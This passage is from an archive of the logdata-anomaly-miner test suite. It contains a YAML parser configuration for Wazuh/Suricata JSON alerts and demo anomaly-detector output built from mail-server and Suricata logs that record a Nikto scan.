optional_key__EXE: optional_key__EXE optional_key__CMDLINE: optional_key__CMDLINE optional_key__CAP_EFFECTIVE: optional_key__CAP_EFFECTIVE 
optional_key__SELINUX_CONTEXT: optional_key__SELINUX_CONTEXT optional_key__SYSTEMD_CGROUP: optional_key__SYSTEMD_CGROUP optional_key__SYSTEMD_UNIT: optional_key__SYSTEMD_UNIT optional_key__SYSTEMD_SLICE: optional_key__SYSTEMD_SLICE optional_key__SYSTEMD_INVOCATION_ID: optional_key__SYSTEMD_INVOCATION_ID optional_key_JOURNAL_NAME: optional_key_JOURNAL_NAME optional_key_JOURNAL_PATH: optional_key_JOURNAL_PATH optional_key_CURRENT_USE: optional_key_CURRENT_USE optional_key_CURRENT_USE_PRETTY: optional_key_CURRENT_USE_PRETTY optional_key_MAX_USE: optional_key_MAX_USE optional_key_MAX_USE_PRETTY: optional_key_MAX_USE_PRETTY optional_key_DISK_KEEP_FREE: optional_key_DISK_KEEP_FREE optional_key_DISK_KEEP_FREE_PRETTY: optional_key_DISK_KEEP_FREE_PRETTY optional_key_DISK_AVAILABLE: optional_key_DISK_AVAILABLE optional_key_DISK_AVAILABLE_PRETTY: optional_key_DISK_AVAILABLE_PRETTY optional_key_LIMIT: optional_key_LIMIT optional_key_LIMIT_PRETTY: optional_key_LIMIT_PRETTY optional_key_AVAILABLE: optional_key_AVAILABLE optional_key_AVAILABLE_PRETTY: optional_key_AVAILABLE_PRETTY optional_key__SOURCE_REALTIME_TIMESTAMP: optional_key__SOURCE_REALTIME_TIMESTAMP optional_key_JOB_TYPE: optional_key_JOB_TYPE optional_key_JOB_RESULT: optional_key_JOB_RESULT optional_key_UNIT: optional_key_UNIT optional_key_INVOCATION_ID: optional_key_INVOCATION_ID optional_key__STREAM_ID: optional_key__STREAM_ID optional_key__AUDIT_TYPE: optional_key__AUDIT_TYPE optional_key__AUDIT_ID: optional_key__AUDIT_ID optional_key__AUDIT_FIELD_APPARMOR: optional_key__AUDIT_FIELD_APPARMOR optional_key__AUDIT_FIELD_OPERATION: optional_key__AUDIT_FIELD_OPERATION optional_key__AUDIT_FIELD_PROFILE: optional_key__AUDIT_FIELD_PROFILE optional_key__AUDIT_FIELD_NAME: optional_key__AUDIT_FIELD_NAME optional_key_ADDRESS: optional_key_ADDRESS optional_key_PREFIXLEN: optional_key_PREFIXLEN optional_key_GATEWAY: optional_key_GATEWAY optional_key__AUDIT_SESSION: optional_key__AUDIT_SESSION optional_key__AUDIT_LOGINUID: 
optional_key__AUDIT_LOGINUID optional_key_SESSION_ID: optional_key_SESSION_ID optional_key_USER_ID: optional_key_USER_ID optional_key_LEADER: optional_key_LEADER optional_key_KERNEL_USEC: optional_key_KERNEL_USEC optional_key_USERSPACE_USEC: optional_key_USERSPACE_USEC optional_key__SYSTEMD_OWNER_UID: optional_key__SYSTEMD_OWNER_UID optional_key_USER_UNIT: optional_key_USER_UNIT optional_key_USER_INVOCATION_ID: optional_key_USER_INVOCATION_ID optional_key__SYSTEMD_USER_SLICE: optional_key__SYSTEMD_USER_SLICE optional_key__SYSTEMD_USER_UNIT: optional_key__SYSTEMD_USER_UNIT optional_key__SYSTEMD_SESSION: optional_key__SYSTEMD_SESSION Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-wazuh-demo.yml000066400000000000000000000172241437606560100314430ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/wazuh.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: level type: DecimalIntegerValueModelElement name: 'level' - id: description type: FixedWordlistDataModelElement name: 'description' args: - 'IDS event.' 
- 'Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character' - id: id type: DecimalIntegerValueModelElement name: 'id' value_pad_type: 'zero' - id: firedtimes type: DecimalIntegerValueModelElement name: 'firedtimes' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: groups type: FixedWordlistDataModelElement name: 'name' args: - 'ids' - 'suricata' - id: name type: FixedWordlistDataModelElement name: 'name' args: - 'user-0' - id: id_sec type: DateTimeModelElement name: 'id_sec' date_format: '%s.%f' - id: full_log type: AnyByteDataModelElement name: 'full_log' - id: predecoder_timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%d/%m/%Y-%H:%M:%S.%f' - id: _parent type: FixedWordlistDataModelElement name: '_parent' args: - 'snort' - id: decoder_name type: FixedWordlistDataModelElement name: 'name' args: - 'snort' - 'json' - id: _srcip type: IpAddressDataModelElement name: '_srcip' - id: dstip_ip type: IpAddressDataModelElement name: 'dstip_ip' - id: colon type: FixedDataModelElement name: 'colon' args: ':' - id: port type: DecimalIntegerValueModelElement name: 'port' - id: _dstip type: SequenceModelElement name: '_dstip' args: - dstip_ip - colon - port - id: data_id type: FixedWordlistDataModelElement name: 'data_id' args: - '1:2221030:1' - id: location type: FixedWordlistDataModelElement name: 'location' args: - '/var/log/forensic/suricata/fast.log' - '/var/log/forensic/suricata/eve.json' - id: _in_iface type: FixedWordlistDataModelElement name: '_in_iface' args: - 'eth0' - id: _event_type type: FixedWordlistDataModelElement name: '_event_type' args: - 'alert' - id: _src_ip type: IpAddressDataModelElement name: '_src_ip' - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: IpAddressDataModelElement name: '_dest_ip' - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: 
'_proto' args: - 'TCP' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'SURICATA HTTP METHOD terminated by non-compliant character' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Generic Protocol Command Decode' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: hostname type: FixedWordlistDataModelElement name: 'hostname' args: - 'mail.cup.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&=+$,/?%#\~ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)' - id: http_content_type type: FixedWordlistDataModelElement name: 'http_content_type' args: - 'text/html' - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: status type: DecimalIntegerValueModelElement name: 'status' - id: length type: DecimalIntegerValueModelElement name: 'length' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp rule: level: level description: description id: id firedtimes: firedtimes mail: bool_wordlist groups: - groups agent: id: id name: name manager: name: name id: id_sec full_log: full_log _predecoder: timestamp: predecoder_timestamp decoder: _parent: _parent name: decoder_name data: _srcip: _srcip _dstip: _dstip _id: data_id _timestamp: timestamp _flow_id: id_sec _in_iface: _in_iface _event_type: 
_event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _tx_id: _tx_id _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _http: hostname: hostname url: url http_user_agent: http_user_agent http_content_type: http_content_type http_method: http_method protocol: protocol status: status length: length location: location Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/000077500000000000000000000000001437606560100276605ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/aminer.log000066400000000000000000045524711437606560100316600ustar00rootroot00000000000000{ "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(es) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str" ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", 
"/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", 
"/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 12, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Syslog disconnected user info", "Message": "New value combination(s) detected", "PersistenceFileName": "syslog_disconnected_user", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user/user", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method/method", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured" ], "AffectedLogAtomValues": [ null, null, 3232238318, 3232238234, null ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 
secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth 
attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(es) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found", "/parser/model/fm/no_host_found/no_host_found_str", "/parser/model/fm/no_host_found/ip" ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 5, "AnalysisComponentType": "NewMatchPathValueDetector", "AnalysisComponentName": "Exim no host name found ip", "Message": "New value(s) detected", "PersistenceFileName": "exim_no_host_name_found_ip", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found/ip" ], "AffectedLogAtomValues": [ 3232238318 ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { 
"AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80", "/parser/model/time": 1583349513.887668, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46762, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80" ], "Timestamps": [ 1583349513.89 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err 
message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80", "/parser/model/time": 1583349514.13232, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46764, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.13256, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": 
"\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46764, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2024454293684286, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err 
